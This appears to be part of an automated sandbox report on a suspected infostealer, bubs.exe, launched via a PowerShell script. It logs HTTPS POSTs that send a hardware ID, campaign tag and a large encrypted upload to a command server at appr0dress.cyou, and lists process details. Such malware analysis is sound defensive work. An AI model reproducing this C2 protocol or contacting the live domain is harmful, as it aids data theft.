2024-11-20 11:39:11 UTC	15331	OUT	Data Raw: 2d 2d 42 56 43 4f 51 37 48 36 58 47 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 38 45 31 31 37 39 34 35 34 43 37 41 43 35 34 39 46 44 35 43 30 32 32 32 38 44 42 33 31 0d 0a 2d 2d 42 56 43 4f 51 37 48 36 58 47 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 56 43 4f 51 37 48 36 58 47 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 63 72 79 70 74 31 38 6e 65 77 0d 0a 2d 2d 42 56 43 4f 51 37 48 36 58 Data Ascii: --BVCOQ7H6XG07Content-Disposition: form-data; name="hwid"84D8E1179454C7AC549FD5C02228DB31--BVCOQ7H6XG07Content-Disposition: form-data; name="pid"3--BVCOQ7H6XG07Content-Disposition: form-data; name="lid"IRiaFi--crypt18new--BVCOQ7H6X
2024-11-20 11:39:11 UTC	4601	OUT	Data Raw: 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-11-20 11:39:11 UTC	992	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2o7ssf2khevrfuk7a0p4mddgj0; expires=Sun, 16-Mar-2025 05:25:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtjEu0huoxGaeYvLRGxyOAHJ4r1gsiBGa5a2Y8JPFMYP3R8Eo%2BX6RFNm3K3acASkBwYSW4xLRYy%2BPOOR0L%2BYVlpX5KgpaHfisWyKA8iDJXj%2B8AUWsQMhabXY0EEysIqFa58%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e582872dcc341e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2834&recv_bytes=20887&delivery_rate=1691772&cwnd=211&unsent_bytes=0&cid=c4b0bbf1c76cbc6c&ts=550&x=0"
2024-11-20 11:39:11 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-20 11:39:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49833	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:13 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4NPGF6U3BSRNKTYN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1234 Host: appr0dress.cyou
2024-11-20 11:39:13 UTC	1234	OUT	Data Raw: 2d 2d 34 4e 50 47 46 36 55 33 42 53 52 4e 4b 54 59 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 38 45 31 31 37 39 34 35 34 43 37 41 43 35 34 39 46 44 35 43 30 32 32 32 38 44 42 33 31 0d 0a 2d 2d 34 4e 50 47 46 36 55 33 42 53 52 4e 4b 54 59 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 4e 50 47 46 36 55 33 42 53 52 4e 4b 54 59 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 63 72 79 70 74 31 38 6e 65 77 0d Data Ascii: --4NPGF6U3BSRNKTYNContent-Disposition: form-data; name="hwid"84D8E1179454C7AC549FD5C02228DB31--4NPGF6U3BSRNKTYNContent-Disposition: form-data; name="pid"1--4NPGF6U3BSRNKTYNContent-Disposition: form-data; name="lid"IRiaFi--crypt18new
2024-11-20 11:39:13 UTC	983	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ckpj9kphcdtdivrvnbmtsu4gjs; expires=Sun, 16-Mar-2025 05:25:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffb2nkXOZfWeeAH9C1FDjmYkZ1T4Bn2gHfB5TlsOGO1NegtaMp1fYLdtZkFNBI%2Fa1yjMARWQUZYBnYOMAxNQvbR4mE30aXXAgMDwmseyvmxjZJpdEede5wyXLjFHiXRvVXA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e582881093e1760-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1466&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2148&delivery_rate=1982348&cwnd=246&unsent_bytes=0&cid=2b0d4970987004b0&ts=391&x=0"
2024-11-20 11:39:13 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-20 11:39:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49844	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:14 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EIKPOMS7Z5DVXKATN2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 222068 Host: appr0dress.cyou
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: 2d 2d 45 49 4b 50 4f 4d 53 37 5a 35 44 56 58 4b 41 54 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 38 45 31 31 37 39 34 35 34 43 37 41 43 35 34 39 46 44 35 43 30 32 32 32 38 44 42 33 31 0d 0a 2d 2d 45 49 4b 50 4f 4d 53 37 5a 35 44 56 58 4b 41 54 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 49 4b 50 4f 4d 53 37 5a 35 44 56 58 4b 41 54 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 63 72 79 70 74 Data Ascii: --EIKPOMS7Z5DVXKATN2Content-Disposition: form-data; name="hwid"84D8E1179454C7AC549FD5C02228DB31--EIKPOMS7Z5DVXKATN2Content-Disposition: form-data; name="pid"1--EIKPOMS7Z5DVXKATN2Content-Disposition: form-data; name="lid"IRiaFi--crypt
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: c7 d4 5d 7b 71 af 47 5d cd 20 f3 a8 4d 1a b4 b6 f4 fc 76 dd 67 55 8d ef 93 18 ce 30 69 1e d8 d5 d2 43 b8 55 e7 6d 03 e1 ff b8 99 1f 50 d8 fe 96 c6 8b 03 95 5f 79 fb 55 b8 31 67 6b 95 ee db 66 59 77 ca 2a 62 dd 19 cb 75 63 99 a1 55 ad 27 26 a9 41 a7 05 65 92 82 dc c1 36 0f 70 5b fd 77 3b 8d c9 ba 79 79 e4 d1 84 ad 1f 11 19 9c 7e 32 29 49 99 44 72 0b 26 84 2b d6 a5 e0 3b 1e b8 25 a2 fb 68 e3 33 5e 2f 56 f6 b2 57 38 b1 04 72 7f 7d eb 43 26 c6 49 eb a3 36 25 30 a7 3f 18 c2 2b ee c7 c3 f9 6b 59 ed 77 66 f8 a0 e8 50 9b c6 00 19 e6 00 76 b1 a7 0b d9 db e6 33 c5 d6 63 92 5e 09 ca 85 ec f5 d4 47 9e 7e 56 05 9e eb 4b ee 2c 68 8d 56 27 cb 0f 7a dd 9b 88 dc 18 f4 29 c7 97 4e 69 d6 45 c6 45 ba c0 bf 7f 8a 34 30 bd b7 f0 7a fb d6 83 39 4d 8c 7c 00 b2 e1 10 99 b3 ec de Data Ascii: ]{qG] MvgU0iCUmP_yU1gkfYw*bucU'&Ae6p[w;yy~2)IDr&+;%h3^/VW8r}C&I6%0?+kYwfPv3c^G~VK,hV'z)NiEE40z9M\|
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: c1 62 64 1d d6 ff 63 3f d9 d4 b5 a9 80 fa 13 d0 c5 e9 ef 68 03 df bf 3a 33 06 85 67 dc 59 ad 04 85 18 1c 74 20 76 a6 e6 57 9f 2b fd 40 17 52 d8 b3 8a a4 0c 89 33 40 59 63 05 a8 b7 dd cf e1 31 c8 3f 6a c3 5d c6 93 9c 5d 0e ce 20 44 99 0f 5a 16 2a b3 b8 ab 11 71 55 8f 0c 15 69 01 ca 44 61 fb f5 ec ae 3a 67 81 c2 6b 57 52 19 d5 c6 78 2d b3 43 6e 3d 44 f3 5d 7c 41 16 d1 08 ad b7 1e 66 c9 bf 5d 8a d7 60 cd 3b 46 c0 46 06 fd f3 03 61 21 24 90 35 1d 8e a7 6c 70 00 ba 1d 1c 95 80 e9 07 a5 cc 72 40 17 d3 52 ba a7 f1 b7 1a 86 b0 f4 65 e7 94 07 2f 2d db 39 fb 26 8a ce c0 03 5a cc 83 fd ca 5e 24 a2 a0 05 b9 0a 1b 3a cd 13 8f 1b 16 55 7a 6f 85 6a 08 eb 93 d5 24 b4 8b ea 81 c1 40 18 c9 3b e1 5f 7d 34 d7 e3 e7 5d 75 17 7c 75 ab 23 11 b6 ae bf fb 24 6f 99 20 17 77 77 48 Data Ascii: bdc?h:3gYt vW+@R3@Yc1?j]] DZ*qUiDa:gkWRx-Cn=D]\|Af]`;FFa!$5lpr@Re/-9&Z^$:Uzoj$@;_}4]u\|u#$o wwH
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: cc b1 97 1d ff cd 97 69 ee 00 9d 1e 84 6a 70 20 c9 f4 ec a0 52 79 e5 91 48 25 3a bb 4b ee 5d 8e 78 ce fd 1c 58 20 27 86 e2 c0 e5 bf b1 ec f9 e0 90 f4 c6 68 dc d4 9f 35 25 12 47 c2 30 d1 5b ce 82 65 0d 28 98 73 57 5c b9 da b5 5c 52 42 d9 e7 92 be cc cb aa 7f ae 8d d1 b5 3b 59 2f 4c 29 87 b5 db 8f f3 5d 53 39 de 45 26 a4 22 d2 eb c9 69 4b dd e5 7f 49 d1 87 b8 fc fd 8a 88 5f 04 62 b4 1c 2a cb 8f f9 6c e7 3a 5b 17 4b 43 f4 21 3c 59 56 61 d9 98 25 c6 d0 9f 5c 00 18 7c bf 05 ea e4 8f e4 64 94 87 a0 25 55 19 9d 8f a7 38 5d e5 29 cd fd d9 12 91 0c 7e 44 63 be 61 15 11 ed 96 31 cb e2 38 9b cc db a5 78 10 f4 d4 36 7a 00 57 b5 8d ea 93 e9 bb 35 4d 22 7e d2 de eb e4 c6 7e 77 26 15 47 ca a8 2f 6e af cf 02 f6 ec 03 47 af a2 5e 6a 7d 4b 48 d5 7d f8 8f 45 f1 c7 80 38 76 Data Ascii: ijp RyH%:K]xX 'h5%G0[e(sW\\RB;Y/L)]S9E&"iKI_b*l:[KC!<YVa%\\|d%U8])~Dca18x6zW5M"~~w&G/nG^j}KH}E8v
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: bd e3 ff ef 00 46 eb f7 c6 23 d2 07 c0 ee c4 57 06 48 2e 13 da 20 ec 8e ad 5b d0 83 b5 af a9 69 74 b3 69 d1 b0 99 0d 8f 4f 33 f8 f8 ff f3 09 b8 2c 27 eb 44 44 66 f6 0c 8f 3d c8 40 b8 94 2f 50 83 f0 bf 47 f0 e8 f9 1a 09 f2 f5 2e 61 52 e8 b6 fb 18 6e 5e 97 92 56 16 ba 7e 0b 3f 7f 0c 04 e3 37 ae 7e 9c ac a0 28 5a 50 54 49 81 11 3d 9e ab 27 f2 d3 f9 2d 9e 0a f8 44 f7 ad 6c fb bc ba 57 a4 61 bb 44 41 c5 9e a3 bb 09 b0 4a 1e 76 3f 4e e1 9a 94 85 8d de db 97 5a a3 a6 ee 25 9a 2a 82 2d 19 02 31 3e c3 46 c2 7c c9 72 55 24 8f af 57 09 d7 15 37 39 93 de 47 7e 2e c5 3e 23 51 9c e9 9d df 5d 91 1a 7b c7 59 de d4 ef 91 b5 2d e6 4b ee de 53 b2 7f 42 f7 3f df bc f8 f2 2e ae 47 18 4e 38 b1 33 7e 96 f7 87 3b da c1 78 95 18 99 19 01 ef 8c c1 25 7d f3 b0 ef 6a b4 dc ae ef 9b Data Ascii: F#WH. [itiO3,'DDf=@/PG.aRn^V~?7~(ZPTI='-DlWaDAJv?NZ%*-1>F\|rU$W79G~.>#Q]{Y-KSB?.GN83~;x%}j
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: 09 8a 05 f7 21 4f 1a 4a 75 e1 6c b1 34 11 32 80 3b 57 44 82 54 f8 e7 b2 f2 62 7c 48 87 5d 0b f3 c5 59 12 a8 7f 55 46 de df a9 b0 0a 44 79 98 00 41 66 fd 20 c3 f0 27 99 1b 7f 9e 6d 1d d5 fd c3 4a fd 82 ce 68 67 2d e2 a4 6b 45 89 ea 34 ca f3 f4 a5 8c dc f9 94 c4 50 6d 09 d6 4d 8f d5 03 f8 40 d6 bc df db 35 8a 72 cf 79 47 28 de e7 b2 f9 cd 87 e9 85 a1 e9 f5 e6 0c 81 3d eb a7 33 7c d1 97 a2 a3 29 ea 4f 9e 2b db 25 53 32 b9 be 5b 37 0a bf 2b 0e 71 9d 2b 65 68 71 e5 9f c6 7f 64 83 8d df 85 4e a7 74 ca b1 33 38 52 dd 19 5f ba 47 65 4b 59 4f 32 10 c0 37 60 e6 64 6b a5 a6 38 f0 e2 be 82 94 ba 38 79 7e b4 93 2b 08 ba e4 14 7c 99 cd d6 b4 79 6a 14 8e c8 aa ed 03 98 8a 9a 52 ef 87 27 9e 5e 2a 4f f5 b5 9d 86 ee 9e be 0e b7 e9 d9 11 0d 62 b5 4b 69 c1 24 1e a7 2d 8e ef Data Ascii: !OJul42;WDTb\|H]YUFDyAf 'mJhg-kE4PmM@5ryG(=3\|)O+%S2[7+q+ehqdNt38R_GeKYO27`dk88y~+\|yjR'^*ObKi$-
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: 7d ee 0d 40 8c 54 82 42 4a df 5d 11 ce c2 ff fd 82 fe 32 49 6a 60 2e e8 d5 3c a4 d6 41 e6 a4 78 fc a1 9c 00 e5 27 aa 79 4c e4 d0 2f bc 08 02 d0 c0 ed 9a 9c 29 2f 40 0c 75 7e 2b dc b8 14 08 79 db a1 86 bc ab ca 1e 02 2f bf 2c a1 03 c8 fc 01 56 f9 00 43 62 84 82 cf 2e c1 25 37 6c 9d ec bc 70 3e 0c 0f 76 ec fb 29 e8 60 c6 60 c0 bd 4f 4e 55 a4 e9 98 46 7d d6 4f e0 5f c7 f9 9f 5f 3a 52 7b 08 58 81 fb 0b c4 3c 67 cb 7c bd 53 db 01 31 2c 9e 51 e5 7e 30 0f e9 50 56 cc 2f 4b 82 a3 9c 2f 2a ae 91 c7 74 40 d9 05 81 fc 1f c8 60 7c e4 3b 22 4a 52 c8 fe 67 67 2c 22 c8 75 68 84 c3 9b 15 95 4e 85 92 3c 9b 73 f4 67 cb 14 b3 e9 fd 94 ea dc 74 c1 40 8c 00 3c 38 f6 e9 4c 25 7f 2d 72 91 16 0b c4 43 11 17 04 82 31 17 ce ec 19 af 6b 67 67 a7 f5 e7 fe 91 ed ea 42 a3 98 11 27 54 Data Ascii: }@TBJ]2Ij`.<Ax'yL/)/@u~+y/,VCb.%7lp>v)``ONUF}O__:R{X<g\|S1,Q~0PV/K/*t@`\|;"JRgg,"uhN<sgt@<8L%-rC1kggB'T
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: 1b 21 2a 00 46 4e a0 d8 8b 05 59 cd 92 ba 03 86 fa a3 90 f0 c1 a2 b3 a0 cf c5 a9 68 e9 40 a7 53 ed cb 0e 4f 13 8b 47 ff cb 04 a5 65 b8 1a 11 d4 7a 0c 38 ea 19 07 c5 ee 03 85 a3 14 a0 09 ca fa c1 05 ea 75 f7 ae 41 8a 8b e5 84 f0 91 83 1d 4d 2f 40 35 97 f8 91 1f 96 a4 4f 11 b6 ac 1b 12 94 ab 94 66 09 e2 1c 28 3f f0 17 ca 9e 0f 9c 37 ed 05 86 17 37 63 78 ea 77 16 78 37 12 b8 28 fb bf bb 6b f6 73 e7 b4 68 c0 2f 2e 4c 5e 3c 02 ac 2c 2e 7b f4 bd dc 86 50 8d 96 21 f1 a5 c3 8d 4a 15 6d 64 a6 27 89 07 17 af cb 7e 77 95 cd 15 3c 79 ff 6e 7f 60 5c 22 67 68 a9 83 d7 66 e6 a3 25 e7 0b 8f 7b da 97 75 72 31 c6 77 66 1f 41 f7 ea 56 5b 56 88 c8 a6 fb ca 23 80 c6 db bd 4d 75 65 a1 7b 5c 55 a5 1f 0b 94 5e 26 a3 1a 93 95 b4 96 5f b8 be 1f 62 e8 e1 8e ad 0c 59 bd 7d 2a cc 23 Data Ascii: !FNYh@SOGez8uAM/@5Of(?77cxwx7(ksh/.L^<,.{P!Jmd'~w<yn`\"ghf%{ur1wfAV[V#Mue{\U^&_bY}#
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: 65 71 28 eb 64 28 ef 5b d7 d8 08 8d da bb e7 02 d4 49 e9 01 e9 de 46 f5 e5 19 43 2f a5 be fb 3a b2 e0 c9 b9 5f 04 1d eb 6d 5f f5 26 ae d3 9f dc 25 fa eb 35 7a c0 b5 3f 71 73 42 a4 17 d3 4c b3 63 ed 9c bf 62 42 c5 89 56 5c ce bf 16 07 c4 35 94 40 23 3e be 21 24 a0 c3 e7 e8 cc 3e e8 44 75 37 3a 58 66 75 b3 1b 83 4a 87 0d aa 3d 32 20 5c 1e 38 9d 6d 84 66 8b d4 41 e7 22 db 80 86 1b 20 86 b5 1d 7f eb 53 46 0d d0 2b 92 1c 40 c3 e9 52 53 3c 05 f7 8c 8e b8 4d f0 85 59 29 fb be 88 d0 33 3a 55 4b 6c 17 36 ec 58 ff 28 7f 6f 6e 7d 65 2c 12 ad 31 1d ce 57 36 5f b6 74 4a 2b 63 c0 65 be da f2 79 fe 89 81 b1 b9 d2 f4 9d 49 9f e4 aa 14 11 7b 86 51 7b ce a8 f7 06 f3 7d 2f 51 4d 63 65 94 57 e8 15 f5 24 e4 00 3d a9 e7 9d fe ae 8a 2f 78 ce 8a 10 d5 0c ff b1 32 3f 50 11 70 03 Data Ascii: eq(d([IFC/:_m_&%5z?qsBLcbBV\5@#>!$>Du7:XfuJ=2 \8mfA" SF+@RS<MY)3:UKl6X(on}e,1W6_tJ+ceyI{Q{}/QMceW$=/x2?Pp
2024-11-20 11:39:14 UTC	15331	OUT	Data Raw: 7f c2 22 1f 60 0d d6 cd 4e 55 4e b6 d9 47 7c 44 ac fe e7 61 0c 80 a7 24 48 9e 58 9c ca 4f 6b 8e da 78 46 7d 10 5a 7c 1f 25 ec a4 72 0d e6 13 95 9f 5a 3e 38 ae b4 ce d1 85 74 0c 5e 67 2a 64 42 e6 54 b4 ff 3c 4a 0f 5c 11 23 80 98 63 54 d6 2e 0f ed c1 ca f6 15 de 5b cd 91 bc 7c f5 da de 23 c4 6b f4 6d a1 67 63 0c 07 78 52 c4 98 c3 1b bb c1 c8 d8 0e 3d 46 19 f6 62 a0 7a ae 1b 9a 7d 0d c7 00 b6 1c 86 b8 8d 01 17 7c 29 2b f6 df 0b 3d b5 88 1d 84 4a 33 25 b7 b4 54 4f 84 1d 2f 92 ca fb a0 b9 48 67 12 45 e4 75 35 08 30 a2 3e 99 b7 d8 24 3d bc 76 f3 ed 22 f0 74 40 96 07 b8 3d 53 7c f9 91 b0 f2 00 57 0f 4f ee 9f f4 12 b0 7c 9b c6 8b cc fa f8 0d 6f 4c c7 fd 57 9f 9e 99 f7 55 7d 03 07 1a b0 66 30 d2 5c 98 4c f4 7a f8 08 fc f4 a6 65 67 6e 20 a9 51 62 a7 c9 1a 7a e3 ec Data Ascii: "`NUNG\|Da$HXOkxF}Z\|%rZ>8t^g*dBT<J\#cT.[\|#kmgcxR=Fbz}\|)+=J3%TO/HgEu50>$=v"t@=S\|WO\|oLWU}f0\Lzegn Qbz
2024-11-20 11:39:15 UTC	987	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ldioc2dndtqsovbh7f5aussub8; expires=Sun, 16-Mar-2025 05:25:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtDsXsPtpG7gAX6oZlCk8v0PToeFUzvQFph6O0lBciAmnQOKPBDck9k6n2WUDrKPzWhwEcNJuaZInctBdw8E27zyowhJmxHVHZpf7qsALzZBxgoC6vmDYT1tlZRmIIllsaA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e582889e96e8c17-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&sent=80&recv=232&lost=0&retrans=0&sent_bytes=2834&recv_bytes=223602&delivery_rate=1437007&cwnd=239&unsent_bytes=0&cid=1ca2508b58c2231f&ts=1050&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49855	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: appr0dress.cyou
2024-11-20 11:39:16 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 49 52 69 61 46 69 2d 2d 63 72 79 70 74 31 38 6e 65 77 26 6a 3d 26 68 77 69 64 3d 38 34 44 38 45 31 31 37 39 34 35 34 43 37 41 43 35 34 39 46 44 35 43 30 32 32 32 38 44 42 33 31 Data Ascii: act=get_message&ver=4.0&lid=IRiaFi--crypt18new&j=&hwid=84D8E1179454C7AC549FD5C02228DB31
2024-11-20 11:39:16 UTC	984	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ami4abf3hfu24lb9ao9q0elqd5; expires=Sun, 16-Mar-2025 05:25:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZO07Ia9Qnjfwe32pmLBvXG9fYqKlsvfxBmdOemCD5d9o55nNdmaBrkJjXzb1HK2AuYt9yXoQV0m9ZQ0rO5GhwKPg%2BEMy0QDBjzn2cY485xNLo%2FoIF1mYp17xxtZeK0ZKaY8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5828944afe7c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=986&delivery_rate=1467336&cwnd=252&unsent_bytes=0&cid=db4b37748bdc242c&ts=395&x=0"
2024-11-20 11:39:16 UTC	54	IN	Data Raw: 33 30 0d 0a 6b 46 4c 59 77 43 79 57 4f 67 7a 59 58 2b 4c 46 6e 33 72 70 6d 4f 6e 6d 61 30 62 63 66 34 6e 2f 67 59 72 53 35 37 41 42 35 69 6a 4c 44 77 3d 3d 0d 0a Data Ascii: 30kFLYwCyWOgzYX+LFn3rpmOnma0bcf4n/gYrS57AB5ijLDw==
2024-11-20 11:39:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	1
Start time:	06:38:50
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:38:50
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:39:03
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\Extra\bubs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Extra\bubs.exe"
Imagebase:	0x2d0000
File size:	4'772'864 bytes
MD5 hash:	442D526A26805C47376D7B4F78374A4F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00007FFD348CC460 Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD348CC57D

Memory Dump Source

